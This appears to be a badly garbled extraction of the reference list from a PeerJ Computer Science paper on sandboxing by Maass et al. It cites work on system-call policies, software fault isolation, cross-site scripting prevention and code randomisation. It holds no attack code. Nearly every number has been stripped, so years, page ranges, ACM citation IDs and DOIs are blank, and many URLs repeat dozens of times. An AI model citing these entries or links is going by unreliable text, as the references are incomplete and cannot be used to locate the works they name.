http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://dx.doi.org/ . /smr. http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . /peerj-cs. arxiv preprint. arxiv: . . li n, mao z, chen h. . usable mandatory integrity protection for operating systems. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . li y, mccune j, newsome j, perrig a, baker b, drewry w. . minibox: a two-way sandbox for x native code. in: usenix annual technical conference (usenix atc ). philadelphia: usenix association, – available at https://www.usenix.org/conference/ atc /technical-sessions/presentation/li yanlin. linn cm, rajagopalan m, baker s, collberg c, debray sk, hartman jh. . protecting against unexpected system calls. in: usenix security (ssym’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . louw mt, ganesh kt, venkatakrishnan vn. . adjail: practical enforcement of confidentiality and integrity policies on web advertisements. in: usenix security (usenix security’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm? id= . . louw mt, venkatakrishnan vn. . blueprint: robust prevention of cross-site scripting attacks for existing browsers. in: ieee symposium on security and privacy (sp ’ ). washington, d.c.: ieee computer society, – . maass m, scherlis wl, aldrich j. . in-nimbo sandboxing. in: symposium and bootcamp on the science of security (hotsos ’ ). new york: acm, pages, article . maechler m, rousseeuw p, struyf a, hubert m, hornik k. . cluster: cluster analysis basics and extensions. r package version . . . vienna: r foundation for statistical computing. for new features, see the ‘changelog’ file (in the package source). mao y, chen h, zhou d, wang x, zeldovich n, kaashoek mf. . software fault isolation with api integrity and multi-principal modules. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . mauczka a, schanes c, fankhauser f, bernhart m, grechenig t. . mining security changes in freebsd. in: mining software repositories (msr). washington, dc: ieee, – . mccamant s, morrisett g. . evaluating sfi for a cisc architecture. in: usenix security (usenix-ss’ ). berkeley: usenix association, pages, article . available at http://dl.acm. org/citation.cfm?id= . . mccune jm, li y, qu n, zhou z, datta a, gligor v, perrig a. . trustvisor: efficient tcb reduction and attestation. in: ieee symposium on security and privacy (sp ’ ). washington, d.c.: ieee computer society, – . mclean j. . is the trusted computing base concept fundamentally flawed? in: ieee symposium on security and privacy (sp ’ ). washington, d.c.: ieee computer society, available at http:/ /dl.acm.org/citation.cfm?id= . . meyerovich la, livshits b. . conscript: specifying and enforcing fine-grained security policies for javascript in the browser. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . mickens j. . pivot: fast, synchronous mashup isolation using generator chains. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . moshchuk a, wang hj, liu y. . content-based isolation: rethinking isolation policy design on client systems. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . neumann pg. . inside risks: insecurity about security? communications of the acm : – doi . / . . maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://arxiv.org/abs/ . https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc /technical-sessions/presentation/li_yanlin http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. nguyen-tuong a, hiser j, co m, davidson jw, knight jc, kennedy n, melski d, ella w, hyde d. . to b or not to b: blessing os commands with software dna shotgun sequencing. in: dependable computing conference. washington, dc: ieee, – . nikolaev r, back g. . virtuos: an operating system with kernel virtualization. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . niu b, tan g. . monitor integrity protection with space efficiency and separate compilation. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . oda t, wurster g, van oorschot pc, somayaji a. . soma: mutual approval for included content in web pages. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . owen c, grove d, newby t, murray a, north c, pope m. . prism: program replication and integration for seamless mils. in: ieee symposium on security and privacy. washington, dc: ieee, – . pappas v, polychronakis m, keromytis ad. . smashing the gadgets: hindering return-oriented programming using in-place code randomization. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . parno b, mccune jm, wendlandt d, andersen dg, perrig a. . clamp: practical prevention of large-scale data leaks. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . payer m, hartmann t, gross tr. . safe loading—a foundation for secure execution of untrusted programs. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . payne bd, carbone m, sharif m, lee w. . lares: an architecture for secure active monitoring using virtualization. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . petroni jr nl, hicks m. . automated detection of persistent kernel control-flow attacks. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . politz jg, eliopoulos sa, guha a, krishnamurthi s. . adsafety: type-based verification of javascript sandboxing. in: usenix security (sec’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . provos n. . improving host security with system call policies. in: usenix security (ssym’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at http://www.r-project.org/. reis c, dunagan j, wang hj, dubrovsky o, esmeir s. . browsershield: vulnerability-driven filtering of dynamic html. in: usenix symposium on operating systems design and implementation (osdi) (osdi ’ ). berkeley: usenix association, – . available at http: //dl.acm.org/citation.cfm?id= . . ringenburg mf, grossman d. . preventing format-string attacks via automatic and efficient dynamic checking. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . rodes bd, knight jc, nguyen-tuong a, hiser jd, co m, davidson jw. . a case study of security case development. in: engineering systems for safety. newcastle upon tyne: safety-critical systems club, – . maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . 